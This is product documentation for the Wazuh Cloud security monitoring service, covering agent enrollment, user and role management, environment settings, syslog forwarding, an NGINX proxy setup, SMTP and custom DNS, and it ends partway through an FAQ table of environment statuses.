For security reasons, we recommend changing the default password and creating your own users.

Follow these steps to reset the default credentials to connect to the Wazuh dashboard:

  1. Log in to the Wazuh dashboard with the default credentials.

  2. Click the wazuh_admin user in the top-right corner.

  3. Click Reset password.

  4. On the Reset password page, fill in the current password and new password.

  5. Click Reset.

Note

You can access the Wazuh dashboard directly using the URL https://<CLOUD_ID>.cloud.wazuh.com, where <CLOUD_ID> is the Cloud ID of your environment. If you have any questions about the Wazuh Cloud, see the Cloud service FAQ.

Next steps

Your Wazuh Cloud environment is ready, and you can install the Wazuh agent on the endpoints you want to monitor. See the Enroll agents section to learn how to install agents.

Enrolling agents

Enrolling agents is the process of connecting your endpoints (servers, workstations, or cloud instances) to your Wazuh Cloud environment. Once enrolled, Wazuh agents begin forwarding security telemetry such as logs, vulnerabilities, and configuration data.

Deploying agent

To start using Wazuh, you need to install a Wazuh agent on your endpoint and enroll it in your environment.

Follow these steps to deploy an agent:

  1. Log into the Wazuh dashboard.

  2. Click the upper-left menu icon, expand Agents management and select Summary.

  3. Click Deploy new agent.

  4. Follow the steps outlined on the Deploy new agent page.

Enrolling an agent
Verifying agent enrollment

Once installed, the agent automatically attempts to connect to Wazuh Cloud. Verify the enrollment by following the steps below:

  1. Log into the Wazuh dashboard.

  2. Click the upper-left menu icon, expand Agents management and select Summary.

  3. The list of agents is displayed on the Summary page.

Verifying agent enrollment
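
In addition to the dashboard, you can also check enrollment from the endpoint itself. A minimal sketch for a Linux endpoint, assuming the default /var/ossec installation directory and a recent agent version that writes the wazuh-agentd.state file: confirm the service is running, then check that the state file reports status='connected'.

    # systemctl status wazuh-agent
    # grep ^status /var/ossec/var/run/wazuh-agentd.state
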
Creating agent groups

Agent groups in Wazuh are used to organize and manage agents by grouping them based on criteria such as role, location, or system type. This allows for centralized management and tailored configuration, enabling you to apply rules, policies, and settings efficiently. New agents are automatically assigned to a default group called "default" if they are not placed in another group. Use the default group for basic monitoring first, then assign agents to more appropriate groups as needed.

To manage devices within your environment more efficiently, you can create groups and assign agents to these groups at the point of enrollment, as shown in the example after these steps. Follow these steps to create groups on your dashboard:

  1. Log in to the Wazuh dashboard.

  2. Click the upper-left menu icon, expand Agents management and select Groups.

  3. Click Add new group in the upper-right corner of the Groups page.

  4. Specify the group name and click Save new group.

Create agent group
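
As an example of assigning a group at enrollment time, the Wazuh agent packages accept deployment variables, including WAZUH_AGENT_GROUP. The sketch below assumes an RPM-based Linux endpoint and a hypothetical group named webservers; the Deploy new agent page generates the exact, up-to-date command for your environment, so prefer that output over this illustration:

    # WAZUH_MANAGER="<CLOUD_ID>.cloud.wazuh.com" \
    WAZUH_REGISTRATION_PASSWORD="<PASSWORD>" \
    WAZUH_AGENT_GROUP="webservers" \
    yum install wazuh-agent
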
Cloud service FAQ
What is Wazuh Cloud?

Wazuh Cloud hosts and manages all the Wazuh central components in a single platform. You create an environment, enroll Wazuh agents, and use capabilities such as security information and event management (SIEM) and extended detection and response (XDR).

Can I try it for free?

Yes, you can sign up for a 14-day free trial. No credit card is required.

Will I be charged when my trial is over?

No, we do not charge you during the trial. After the trial expires, the default payment method is charged. You will receive a reminder 7 days before the trial expiration. Make sure you add your billing information; otherwise, your environment is deleted completely on the expiration date.

Is Wazuh Cloud PCI DSS compliant?

Yes. Wazuh Cloud is validated as a PCI DSS Level 1 Service Provider.

Is Wazuh Cloud SOC 2 compliant?

Yes, Wazuh Cloud complies with SOC 2 standards.

How can I get support?

Support is included after your first payment. Contact us from the Help section in the Wazuh Cloud Console. You can also fill out this form to get help from the Wazuh team.

Where is Wazuh Cloud hosted?

Wazuh Cloud is hosted on Amazon Web Services (AWS).

What is a profile?

A profile is a predefined set of settings for a Wazuh Cloud environment. We offer three profiles: Small, Medium, and Large. They provide ready-to-use environment templates that cater to different needs and requirements. If none fits your requirements, configure the settings individually.

What is a setting?

A setting is a configuration option for a Wazuh Cloud environment. Settings define limits and functionality. For example, the Active agents setting specifies the maximum number of active agents in your environment. Your chosen settings affect pricing.

What is the indexed data?

Indexed data (previously hot storage) is the data available on the Wazuh dashboard. Wazuh ingests events from agents, indexes them, and makes them searchable and analyzable.

What is the archive data?

Wazuh archives data in an AWS S3 bucket for long‑term storage. Unlike indexed data, archive data is not searchable or analyzable. It consists of compressed files. For more information, see the Archive data section.

What happens if the tier limit is reached?

See What happens if the indexed data capacity setting is reached?.

What happens if the indexed data capacity setting is reached?

When the indexed data capacity is reached, Wazuh automatically removes the oldest events from the index. The removed data remains available as archive data. See the Archive data section to learn more.

How is indexed data rotated?

Rotation depends on two conditions: indexed data retention and indexed data capacity. For example, with 3‑month retention and 100 GB capacity, if you use 100 GB in the first month, rotation starts immediately. If you use only 20 GB, data from month one rotates at month four.

What happens if the average/peak EPS is exceeded?

If incoming events per second exceed the average/peak EPS setting, events queue. When the queue is full, Wazuh discards new events, which can cause event loss.

Can I increase the average/peak EPS?

See Adjusting environment settings.

Can I cancel at any time?

Yes. You can cancel at any time with no penalty. You can use your environment until the end of your current billing cycle, and no future charges are incurred after this period.

Your environment

The Wazuh Cloud environment contains all the Wazuh components ready for you to use.

Learn more about your environment in the sections below.

Authentication and authorization

You can use the native support for managing and authenticating users or integrate with external user management systems.

Note

You cannot log in to the Wazuh dashboard with your Wazuh Cloud account credentials. To log in to the Wazuh dashboard, use the default credentials from the Wazuh Cloud Console or credentials for a dashboard user you created.

Native support for users and roles

The Wazuh dashboard allows you to add users, create roles, and map roles to users. The following sections describe these tasks in more detail.

Creating an internal user

Follow these steps to create an internal user.

  1. Log in to the Wazuh dashboard.

  2. Click the upper-left menu icon, expand Indexer management and select Security.

  3. Select Internal users on the left pane, click Create internal user and complete the fields.

  4. Click Create to complete the action.

    Create internal user
Managing Wazuh indexer roles

Indexer roles are the core way of controlling access to your Wazuh indexer cluster. Roles contain any combination of cluster-wide permissions, index-specific permissions, document- and field-level security, and tenants. These roles define what a user can query, view, or manage within the indexer (logs, alerts, dashboards).

Note

You cannot customize reserved roles. Create a custom role with the same permissions or duplicate a reserved role to customize it. Then you map users to these roles so that users gain those permissions.

Follow these steps to create an indexer role using existing role templates:

  1. Log in to the Wazuh dashboard.

  2. Click the upper-left menu icon, expand Indexer management and select Security.

  3. Click on Roles on the left panel and select a role with the required permissions.

  4. Click Actions at the top section and select Duplicate.

  5. Fill in the required information on the Duplicate Role page.

  6. Click Create to complete the process.

    Managing indexer roles
Mapping users to Wazuh indexer roles

Wazuh indexer role mappings are how users are granted access to indexed data in Wazuh. While indexer roles define the set of permissions available (such as searching logs, viewing alerts, or managing index patterns), role mappings connect those roles to individual users or user groups. This allows administrators to control who can query data, build dashboards, or access specific indices.

Follow these steps to map users to appropriate indexer roles:

  1. Log in to the Wazuh dashboard.

  2. Click the upper-left menu icon, expand Indexer management and select Security.

  3. Click on Roles on the left panel and search for the role created previously.

  4. Click the role name to open its details.

  5. Select the Mapped users tab and click Manage mapping.

  6. Add the internal user and click Map to confirm the action.

    Mapping users to Wazuh indexer roles
Managing Wazuh server roles

Wazuh server roles are the primary way of controlling access to the Wazuh platform. They define what actions a user can perform within the Wazuh server and dashboard. Server roles may include permissions to manage agents, configure rules, adjust settings, or perform read-only operations. By assigning roles, administrators can control who is allowed to view alerts, enroll or remove agents, modify security configurations, or access sensitive management functions.

Note

Policies assigned during role creation define the permissions associated with the role. Explore the Policies pane before creating a role to understand the actions and other components that make up a policy.

In most cases, the available roles are sufficient for day-to-day operations. However, depending on user requirements, new roles can be created.

Follow these steps to create a server role:

  1. Log in to the Wazuh dashboard.

  2. Click the upper-left menu icon, expand Server management and select Security.

  3. On the Security page, go to the Roles pane.

  4. Click Create role.

  5. Provide a name for the new role and select your preferred policies from the list.

  6. Click Create role to complete the process.

    Managing Wazuh server roles
Mapping users to Wazuh server roles

Wazuh server role mappings are how permissions are assigned to users in the Wazuh platform. While server roles define what actions are possible, role mappings connect those roles to specific users or user groups. This ensures that the right people have the appropriate level of access to manage agents, configure rules, or view alerts. By managing role mappings, administrators control who can perform operational and administrative tasks within Wazuh.

Follow these steps to map users to server roles:

  1. Log in to the Wazuh dashboard.

  2. Click the upper-left menu icon, expand Server management and select Security.

  3. On the Security page, go to the Roles mapping pane.

  4. Click Create Role mapping.

  5. Assign a name to the role mapping.

  6. Select the roles you want to map the user with.

  7. Select the internal user.

  8. Click Save role mapping to save and map the user with the role.

    Mapping users to Wazuh server roles
Creating and setting a Wazuh admin user

Follow the steps in the Creating an internal user section to create an internal user. Once the user has been created, follow these steps to create the required indexer role and map the created user to the role:

  1. Log in to the Wazuh dashboard.

  2. Click the upper-left menu icon, expand Indexer management and select Security.

  3. Click Roles to open the page and search for the all_access role in the list.

  4. Select it, click Actions and select Duplicate.

  5. Assign a name to the new role, then click Create to confirm the action.

  6. On the newly created role page, select the Mapped users tab and click Manage mapping.

  7. Add the user and click Map to confirm the action.

    Creating and setting a Wazuh admin user

Follow these steps to create the required server role mapping, and map the user with the role to assign admin permissions:

  1. Click the upper-left menu icon, expand Server management and select Security.

  2. On the Security page, go to the Roles mapping pane.

  3. Click Create Role mapping.

  4. Assign a name to the role mapping.

  5. Select administrator in the role field.

  6. Select the internal user.

  7. Click Save role mapping to save and map the user as an administrator.

    Creating server role mapping
Creating and setting a Wazuh read-only user

Follow the steps in the Creating an internal user section to create an internal user. Once the user has been created, follow these steps to create the required indexer role and map the created user to the role:

  1. Log in to the Wazuh dashboard.

  2. Click the upper-left menu icon, expand Indexer management and select Security.

  3. Click Roles to open the page and click Create role.

  4. Assign a name to the new role.

  5. Select the following options in the empty fields:

    1. Cluster permissions: cluster_composite_ops_ro

    2. Index: *

    3. Index permissions: read

    4. Tenant permissions: global_tenant and select the Read only option.

  6. Click Create to complete the process.

  7. On the newly created role page, select the Mapped users tab and click Manage mapping.

  8. Add the user and click Map to confirm the action.

    Creating and setting a Wazuh read-only user

Follow these steps to create the required server role mapping, and map the user with the role to assign read-only permissions:

  1. Click the upper-left menu icon, expand Server management and select Security.

  2. Go to the Roles mapping pane on the Security page.

  3. Click Create Role mapping.

  4. Assign a name to the role mapping.

  5. Select readonly in the role field.

  6. Select the internal user.

  7. Click Save role mapping to save and map the user with the read-only role.

    Creating server role mapping

To add more read-only users, you can skip the role creation task and map the users to the already existing read-only role.

Integrating with external user management systems

In many organizations, user access is centrally managed through directory services such as Active Directory, Keycloak, or other identity providers. Integrating Wazuh Cloud with these external systems ensures that authentication and authorization are consistent with existing security policies. This approach simplifies user management, improves compliance, and reduces the overhead of maintaining separate accounts just for Wazuh.

Wazuh Cloud supports integration with external user management systems such as LDAP for authentication. To enable this feature, open a support ticket through the Help section in your Wazuh Cloud Console, and the Wazuh Support team will guide you through the setup process.

Settings

Every cloud environment is configured based on specific settings that define its limitations and pricing. We offer six settings, comprising four basic and two advanced settings. Advanced settings are calculated from basic settings, but you can modify them.

To monitor your environment and check whether settings are being reached, see the Monitor usage section.

Understanding environment settings
Active agents

This basic setting sets the maximum count of active Wazuh agents that the environment can support. Please note that while registering an unlimited number of Wazuh agents is possible, the active agent count is limited by this setting.

If the maximum number of active agents is reached, the environment might start to malfunction, causing instability with agent connections. Although the system can temporarily handle exceeding the active agent limit, appropriate measures will be taken if the situation persists.

Indexed data

Indexed data is the data available on the Wazuh dashboard. Wazuh ingests events from agents, indexes them, and makes them searchable and analyzable.

Two settings define indexed data behavior:

  • Indexed data retention: It determines the maximum duration for which data remains indexed. This is a basic setting.

  • Indexed data capacity: It defines the maximum size, in bytes, of the indexed data. This is an advanced setting, and the interface provides a suggestion when selecting the Indexed data retention.

Data remains indexed until retention or capacity is reached. When either is reached, rotation removes the oldest data until the condition clears.

To configure index management policies, see Index lifecycle management documentation.

Archive data

This basic setting (previously cold storage) defines how long Wazuh stores analyzed data in an AWS S3 bucket. Unlike indexed data, archive data is not searchable or analyzable. It is a set of compressed files.

When the specified retention period has passed, Wazuh removes any archived files that are older than the configured time window.

Support plan

This setting indicates whether the support level is premium or standard.

Average/Peak EPS

This advanced setting is the average and maximum number of events per second (EPS) the environment analyzes. The interface suggests a value when you select the Active agents setting.

If ingestion exceeds the peak EPS, events queue. When the queue is full, Wazuh discards new events, which causes event loss. Queueing is managed automatically by the cloud service, ensuring optimal resource utilization.

The environment is configured with the limits eps option using the following parameters:

  • timeframe = 1 second

  • maximum = Peak EPS / number of server nodes

The number of server nodes is automatically determined by the cloud service based on the workload. For instance, if the Average/Peak EPS setting is 100/500 EPS and there is a cluster of 2 nodes at the current time, each node can process up to 250 events per second (500 peak EPS / 2 server nodes).
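
Wazuh Cloud applies this configuration for you, but as an illustration, here is a sketch of the resulting limits eps block in the manager configuration, assuming the syntax of recent Wazuh versions and the two-node example above (500 peak EPS split across 2 nodes):

<global>
  <limits>
    <eps>
      <!-- Example value: peak EPS divided by the number of server nodes -->
      <maximum>250</maximum>
      <!-- Timeframe in seconds -->
      <timeframe>1</timeframe>
    </eps>
  </limits>
</global>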

Adjusting environment settings

Managing your environment settings is crucial to meeting your evolving needs and optimizing the performance of your cloud environment. While some settings can be determined upfront, such as the number of active agents, indexed data retention, archive data, and support plan, it's important to note that these requirements may change over time.

Advanced settings might be more challenging to determine in advance. While the interface provides recommendations based on our experience, your specific workload might differ. Hence, we recommend deploying, monitoring, and adjusting the settings as needed to align with your evolving requirements.

To change a setting, open a support ticket. Here is the breakdown of the process:

  • Upgrading a setting: If you upgrade a setting, you are charged a prorated amount for the remainder of the current billing cycle. The change takes effect immediately after payment and your next billing cycle reflects the higher cost.

  • Downgrading a setting: If you downgrade a setting, the change takes effect at the start of the next billing cycle, and your cost is reduced accordingly.

We confirm requested changes with you before applying them or processing any payments, to ensure accuracy and alignment with your requirements.

By monitoring your environment and making necessary adjustments to the settings, you can ensure that your cloud environment remains optimized and aligned with your evolving needs.

Limits

Wazuh Cloud defines limits for key metrics that affect performance and capacity. You cannot change these limits. If an environment reaches a limit, the service might restrict activity. Contact Wazuh Support for help.

Limit definitions

The following limits apply to specific functionality and APIs in Wazuh Cloud.

Dashboards, visualizations, and queries

This limit governs concurrent execution of dashboards, visualizations, and queries. Wazuh Cloud maintains performance and responsiveness, but user‑created queries and visualizations also affect efficiency. Optimize your queries and visualizations to improve performance.

API rate limits

APIs include rate limits to prevent abuse and maintain performance and stability. A rate limit sets the maximum requests per second for a given API. Hitting these limits is rare. They protect the system and help ensure a smooth experience.

The following APIs have rate limits:

  • Agent registration: This controls the maximum rate of registration requests processed per second, ensuring a seamless onboarding process for agents connecting to the Wazuh Cloud environment.

  • Wazuh server API: This specifies the maximum requests allowable per second to the Wazuh server API, ensuring its stability and availability.

  • Wazuh indexer API: This sets the maximum requests allowed per second to the Wazuh indexer API, enabling efficient retrieval and manipulation of indexed data.

  • Access to the Archive data: This sets the maximum requests processed per second for accessing archive data, ensuring efficient retrieval when necessary.

Limitations

Wazuh Cloud is designed as a managed service, meaning that the Wazuh team takes responsibility for infrastructure management, scaling, updates, and security hardening. While this reduces operational overhead for users, it also means that access to certain components of the platform is intentionally limited. These safeguards ensure multi-tenant security, platform stability, and compliance with industry standards.

Dashboard access only

Users interact with Wazuh Cloud exclusively through the Wazuh dashboard and the ports required for agent communication.

Restricted API access
  • The Wazuh Server API and Wazuh indexer API are not accessible by default.

  • Access to these APIs can be enabled on request through Wazuh Support.

  • Even when enabled, only read operations are supported; direct write operations to the indexer API are not permitted.

No CLI access

Users do not have direct command-line or shell access to the underlying cloud infrastructure. This ensures that the environment remains secure, stable, and consistent across tenants.

These restrictions are in place to protect the integrity of the platform and to provide a reliable managed service experience. If you need functionality beyond these defaults, contact Wazuh support to discuss available options.

Cancellation

To cancel your environment:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Environments page and select your environment.

  3. Click Manage and select Cancel environment.

  4. On the next prompt, you are asked to confirm if you would like to cancel the environment.

  5. Type CANCEL in the box provided to confirm the cancellation.

  6. Click Cancel to confirm this action.

The environment is removed at the end of the billing cycle.


Warning

The cancellation cannot be undone, and all data is completely deleted with this action.

Monitor usage

This section provides details on using your environment, helping you to optimize its performance.

Viewing environment usage metrics

To see metrics of your Wazuh Cloud environment, follow these steps:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Environments page and select your specific environment.

  3. Click on the Metrics tab.

Agents metric

The Agents metric shows the number of Wazuh agents in the active, disconnected, never connected, and pending states. It also displays the limit of active agents, which is configurable through the active agents setting.

Exceeding the active agents limit might cause operational issues and decrease system stability. Though the system can handle a temporary surplus of active agents, we advise immediate action:

  • Upgrade the active agents setting to match the actual count.

  • Reduce active agents.

This ensures a smooth operation and stability of your environment.

Data indexed metric

The data indexed metric presents a histogram that shows how much security data has been indexed in your environment over time:

  • X-axis: time

  • Y-axis: indexed data volume (in gigabytes)

  • It also displays the date of the oldest indexed alert currently stored.

This metric helps you verify whether your indexed data capacity and indexed data retention are sufficient for your needs. The Wazuh Cloud environment automatically rotates (deletes) data when either:

  • The used storage exceeds the configured indexed data capacity, or

  • The alert date exceeds the configured indexed data retention period.

How to interpret this metric:

  • If your environment age is less than the configured retention period, the oldest alert date should align with the environment age.

  • If your environment age is greater than or equal to the retention period, the oldest alert date should align with the retention period.

In both cases, your configuration is working correctly and no action is required. If the oldest alert date does not align with either, it indicates premature data rotation. In this case, you should:

  • Increase the indexed data capacity, or

  • Adjust your rule configurations to filter out less critical events and reduce data volume.

Note

The oldest alert date never exceeds the configured retention period; rotation enforces this limit.

Monitoring the data indexed metric ensures that your storage and retention settings continue to match your operational needs. If usage trends change, you can upgrade or downgrade your environment's settings to maintain optimal performance and data availability.

Events - Dropped over time and Events - Processed vs dropped metrics

The Wazuh Cloud dashboard provides two key metrics to help you understand the efficiency of event ingestion and processing in your environment:

  • Events - Dropped over time: A histogram that shows the number of events lost or dropped during a given period. Drops occur when the rate of incoming events exceeds the environment's configured average/peak EPS (events per second) limit. When this happens, the event queues fill up, and additional events are discarded.

  • Events - Processed vs dropped: A pie chart that compares the proportion of successfully processed events against those that were dropped. This provides a quick visual summary of overall event handling performance.

Consistent or frequent event drops indicate that your environment may not be able to handle the current event rate. If this continues, important alerts could be lost, reducing visibility into your security posture.

If you observe a pattern of drops in these metrics, consider the following actions to address this:

  • Increase the EPS setting: Adjust the average/peak EPS configuration to better align with your actual event rate. This ensures your environment can process more events without loss.

  • Review agent configuration: Some agents may be sending excessive or unnecessary data. Tune their configuration to reduce noise, such as by filtering out less critical events before they are sent.

  • Use the leaky bucket algorithm: Implement a leaky bucket configuration on agents to smooth out event flow. This prevents sudden spikes in event bursts that could overwhelm queues and cause drops. A configuration sketch is shown below.

By combining these strategies, you can ensure that your environment remains within its processing limits, reducing the risk of lost events while maintaining efficient and reliable event ingestion.
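
As a sketch of the leaky bucket option mentioned above, the agent buffer is configured in the agent's ossec.conf through the client_buffer block; the values below are illustrative and should be tuned to your actual event rate:

<ossec_config>
  <client_buffer>
    <!-- Keep the buffer (leaky bucket) enabled -->
    <disabled>no</disabled>
    <!-- Example value: maximum number of events held in the buffer -->
    <queue_size>5000</queue_size>
    <!-- Example value: maximum events flushed from the buffer per second -->
    <events_per_second>500</events_per_second>
  </client_buffer>
</ossec_config>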

Forward syslog events

Wazuh agents can run on a wide range of operating systems, but when installing an agent is not possible due to software incompatibilities or business restrictions, you can forward syslog events to your environment instead. This is a common use case for network devices such as routers or firewalls.

Since every communication with your environment is performed through the Wazuh agent, you must configure the agent to forward the syslog events. To do so, you have these options:

Rsyslog on Linux

Use rsyslog on a Linux endpoint with a Wazuh agent to log to a file and send those logs to the environment.

  1. Configure rsyslog to receive syslog events and enable the TCP or UDP settings by editing the /etc/rsyslog.conf file.

    • For TCP:

      $ModLoad imtcp
      $InputTCPServerRun <PORT>
      
    • For UDP:

      $ModLoad imudp
      $UDPServerRun <PORT>
      

    Note

    Make sure to review your firewall/SELinux configuration to allow this communication.
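
    For example, on a firewalld-based system with SELinux enforcing, the adjustments might look like the following; <PORT> is the listener port configured above, and the semanage rule is only needed when using a non-default syslog port:

      # firewall-cmd --permanent --add-port=<PORT>/tcp
      # firewall-cmd --reload
      # semanage port -a -t syslogd_port_t -p tcp <PORT>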

  2. Configure rsyslog to store events received from the remote device in a file by editing the /etc/rsyslog.conf file.

    # Storing Messages from a Remote System into a specific File
    if $fromhost-ip startswith '<REMOTE_DEVICE_IP>' then /var/log/<FILE_NAME>.log
    & ~
    

    Make sure to replace <FILE_NAME> with the name chosen for this log and <REMOTE_DEVICE_IP> with the IP address of the remote device.

  3. Deploy a Wazuh agent on the same endpoint with rsyslog installed.

  4. Configure the agent to read the syslog output file by editing the /var/ossec/etc/ossec.conf file.

    <localfile>
      <log_format>syslog</log_format>
      <location>/var/log/<FILE_NAME>.log</location>
    </localfile>
    
  5. Run the commands below to restart rsyslog and the Wazuh agent:

    # systemctl restart rsyslog
    # systemctl restart wazuh-agent
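
    To confirm the pipeline works, you can send a test message with the logger utility (util-linux) from the remote device, or from any host whose address matches <REMOTE_DEVICE_IP>. The options below assume the TCP listener configured earlier, where <RSYSLOG_SERVER_IP> is the address of the endpoint running rsyslog; the message should then appear in /var/log/<FILE_NAME>.log:

    # logger -n <RSYSLOG_SERVER_IP> -P <PORT> -T "Wazuh syslog forwarding test"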
    
Logstash on Windows

Use Logstash on a Windows endpoint with a Wazuh agent to receive syslog, log to a file, and send those logs to the environment.

  1. Install Logstash.

    1. Download the Logstash ZIP package.

    2. Extract the ZIP contents into a local folder, for example, to C:\logstash\.

  2. Configure Logstash.

    1. Create the following file: C:\logstash\config\logstash.conf

      input {
         syslog {
            port => <PORT>
         }
      }
      
      output {
         file {
            path => "C:\logstash\logs\<FILE_NAME>.log"
            codec => "line"
         }
      }
      
    2. Make sure to replace <FILE_NAME> with the name chosen for this log.

  3. Deploy a Wazuh agent on the same endpoint that has Logstash.

  4. Configure the Wazuh agent to read the Logstash output file by adding the following configuration to the C:\Program Files (x86)\ossec-agent\ossec.conf file:

    <ossec_config>
      <localfile>
         <log_format>syslog</log_format>
         <location>C:\logstash\logs\<FILE_NAME>.log</location>
      </localfile>
    </ossec_config>
    
  5. Run Logstash.

    1. Run Logstash from the command line:

      C:\logstash\bin\logstash.bat -f C:\logstash\config\logstash.conf
      

      Note

      Closing the terminal where Logstash is running terminates it.

    2. Install Logstash as a Windows Service either using NSSM or Windows Task Scheduler.

  6. Restart the Wazuh agent.

    Restart-Service Wazuh
    
Agents without Internet access

In many organizations, certain systems, especially those in restricted, segmented, or highly secure networks do not have direct access to the Internet. These systems still generate important security events that need to be monitored by Wazuh.

Wazuh Cloud supports secure methods to ensure that such isolated or private network agents can still send their data to your cloud environment. This enables visibility across your infrastructure, even for systems operating in air-gapped or compliance-restricted environments. The following options are available for this purpose:

Using a forwarding proxy

It is possible to access your environment using an NGINX forwarding proxy.

Using an NGINX forwarding proxy

To achieve this configuration, follow these steps:

  1. Deploy a new instance in a public subnet with internet access.

  2. Install NGINX on your instance following the NGINX documentation.

  3. Configure NGINX.

    1. Add the following lines to the HTTP section of your NGINX configuration, located in the /etc/nginx/nginx.conf file. This configuration enables NGINX to extract and use the real client IP address from the X-Forwarded-For header and restricts which source addresses are trusted to provide it.

      http {
          real_ip_header X-Forwarded-For;
          set_real_ip_from <nginx_ip>;
      }
      
    2. Add the following block to the end of the NGINX configuration file /etc/nginx/nginx.conf. Replace <CLOUD_ID> with the Cloud ID of your environment and nginx_ip with the IP address of the NGINX instance. This configuration enables stream proxying, where incoming traffic is forwarded to the corresponding upstream server (master or mycluster) based on the port it arrives on: 1515 for agent enrollment and 1514 for agent communication, as specified in the listen directives.

        stream {
          upstream master {
            server <CLOUD_ID>.cloud.wazuh.com:1515;
          }
          upstream mycluster {
            server <CLOUD_ID>.cloud.wazuh.com:1514;
          }
          server {
            listen nginx_ip:1515;
            proxy_pass master;
          }
          server {
            listen nginx_ip:1514;
            proxy_pass mycluster;
          }
        }
      
    3. Restart the NGINX service.

      # systemctl restart nginx
      
    4. Enroll your agent with the IP address of the NGINX instance. To learn more about registering agents, see the Enroll agents section.

      Example:

      # WAZUH_MANAGER_IP=<NGINX_IP_ADDRESS> \
      WAZUH_PASSWORD="<PASSWORD>" \
      yum install wazuh-agent
      

      Replace <PASSWORD> with your Wazuh server enrollment password.

SMTP configuration

Wazuh can be configured to send email alerts to one or more email addresses when certain rules are triggered or for daily event reports.

This configuration requires an SMTP server. You can use your own SMTP server or the Wazuh Cloud SMTP server.

Note

If your SMTP requires authentication, you need to open a ticket through the Help section of your Wazuh Cloud Console to configure it.

The Wazuh Cloud SMTP is limited to 100 emails per hour, regardless of the email_maxperhour setting. To enable the Wazuh Cloud SMTP, configure the following settings:

<global>
  ...
  <smtp_server>wazuh-smtp</smtp_server>
  <email_from>no-reply@wazuh.com</email_from>
  ...
</global>

The Wazuh Cloud SMTP is now successfully configured.
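
For context, email alerting itself is driven by the manager's email settings. A minimal sketch, assuming the standard ossec.conf email options and a hypothetical recipient address (soc@example.com); the alert level and hourly limit are example values:

<global>
  <email_notification>yes</email_notification>
  <smtp_server>wazuh-smtp</smtp_server>
  <email_from>no-reply@wazuh.com</email_from>
  <!-- Hypothetical recipient address -->
  <email_to>soc@example.com</email_to>
  <!-- Example value; the Wazuh Cloud SMTP caps delivery at 100 emails per hour -->
  <email_maxperhour>12</email_maxperhour>
</global>

<alerts>
  <!-- Example value: send email for alerts at this level or higher -->
  <email_alert_level>10</email_alert_level>
</alerts>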

Custom DNS

By default, Wazuh Cloud environments are accessed through a subdomain of cloud.wazuh.com.

You can configure your environment to use your own custom domain. To do this, go to the environment details page in the Wazuh Cloud Console. You need to provide the following:

  • Certificate: SSL/TLS certificate for your domain

    • Must use SHA2

    • Must use RSA with key size of at least 2048 bits

    • TLS Web Server Authentication is required if using EKU

    • Must contain domain name in CN or SAN field(s)

    • Must be PEM encoded

  • Private Key: Associated with the provided certificate

    • Must not be encrypted or require a passphrase

    • Must be PEM encoded

  • Certificate Chain: Used to sign your certificate

    • Must contain all intermediate certificates in the certificate chain

    • Must be signed by a trusted certificate authority

    • Must be PEM encoded

After providing the above and applying the configuration, create a CNAME DNS record using the value provided by the Wazuh Cloud Console.
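
Before uploading, you may want to verify that the files meet the requirements above. A few illustrative OpenSSL checks, assuming hypothetical file names certificate.pem, private-key.pem, and chain.pem: the first command prints the signature algorithm, key size, and CN/SAN entries; the second fails or prompts for a passphrase if the private key is encrypted; the third validates the certificate against the provided chain.

    openssl x509 -in certificate.pem -noout -text
    openssl rsa -in private-key.pem -check -noout
    openssl verify -CAfile chain.pem certificate.pem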

Note

Your Wazuh Cloud environment is still accessible through the default URL, even if you have configured a custom domain.

Technical FAQ
How can I send data to my environment?

All the communications are performed through Wazuh agents once they are registered to the environment.

Is it possible to change the URL to access the environment?

It is possible to get a new URL by opening a support ticket through the Help section on the Wazuh Cloud Console, but the previous URL is also kept.

What happens if the tier limit is reached?

See What happens if the indexed data capacity setting is reached?

What happens if the indexed data capacity setting is reached?

When the selected indexed data capacity is reached, the oldest events are automatically removed from your index, even if they have not yet reached the indexed data retention period. This data remains available in archive data for you to access. See the Archive data section to learn more about data logging and storage.

Can I index the archive data again?

It is possible to download the data from the archive data and re-index it into your local environments. However, it isn't possible to re-index it in your cloud environment.

What if I need to change the size of my tier?

See What if I need to upgrade or downgrade a setting?

What if I need to upgrade or downgrade a setting?

You can upgrade or downgrade a setting by contacting the Wazuh team through the Help section of your Wazuh Cloud Console. See also Adjusting environment settings.

What happens if the active agents setting is reached?

If the maximum number of active agents is reached, the environment may start to malfunction, causing instability with agent connections. While the system can tolerate temporarily exceeding the limit of active agents, appropriate measures will be taken if the situation persists.

What happens if the average/peak EPS setting is reached?

If data ingestion exceeds the configured rate, events start to queue. If the queue becomes full, Wazuh discards the incoming events, which might lead to event loss. The cloud service automatically manages the queuing mechanism, ensuring optimal resource usage.

How do I get SSH access to my environment?

SSH access is not allowed for security reasons. Environments are managed from the Wazuh Cloud Console and Wazuh dashboard. See the Limitations section for more information.

How can I update my environment?

Wazuh takes care of the updates, so your environment gets the latest version of Wazuh with no downtime.

Can I send syslog data directly to the environment?

No, all the communications are performed through Wazuh agents once they are registered into the environment. However, you have alternative options. For more information on how to forward syslog events to your environment, see the Forward syslog events section.

Can I send data directly to the Wazuh indexer of my environment?

No, all the communications are performed through Wazuh agents.

Can I integrate with my Single Sign-On (SSO) method (LDAP, Okta, Active Directories)?

Yes, you can access the Wazuh dashboard of your environment through your SSO tool. To perform this action, you need to contact the Wazuh Support team through the Help section of your Wazuh Cloud Console.

Do I have access to Wazuh API?

You have access to the Dev tools through your Wazuh dashboard, where you can use the server API. The Wazuh server API is not exposed, but you can contact the Wazuh team through the Help section of your Wazuh Cloud Console to allow Wazuh server API access from a specific IP address. See the Limitations section for more information.
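
As an illustration, read-only requests you could try from the API console in Dev tools, assuming the standard Wazuh server API endpoints:

    GET /manager/info
    GET /agents?status=active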

Do I have access to Wazuh indexer API?

The Wazuh indexer API is not accessible by default. If you want to access it, contact the Wazuh team through the Help section of your Wazuh Cloud Console to authorize the connection from a specific IP address. After authorization is granted, you have access to the GET methods of the Wazuh indexer API. See the Limitations section for more information.

How can I forward my logs to another solution or SOC?

You can download your data from archive data. Then, you can push it to other solutions or Security Operations Center (SOC).

Is my environment shared with other customers?

No, your environment is isolated from other customers. That means your account is the only one with access to your environment.

What are the available regions?

Available regions:

Asia Pacific

  • Tokyo: ap-northeast-1

  • Mumbai: ap-south-1

  • Singapore: ap-southeast-1

  • Sydney: ap-southeast-2

Europe

  • Frankfurt: eu-central-1

  • London: eu-west-2

North America

  • Canada: ca-central-1

  • North Virginia: us-east-1

  • Ohio: us-east-2

If you are not sure which region is the best option for you, select the one closest to your location, since this typically reduces latency for indexing and search requests.

What status can my environment have?

Status        Description
-----------   --------------------------------------------------------------------------
Creating      Your environment is being created.
Ready         Your environment was created successfully and is ready to use.
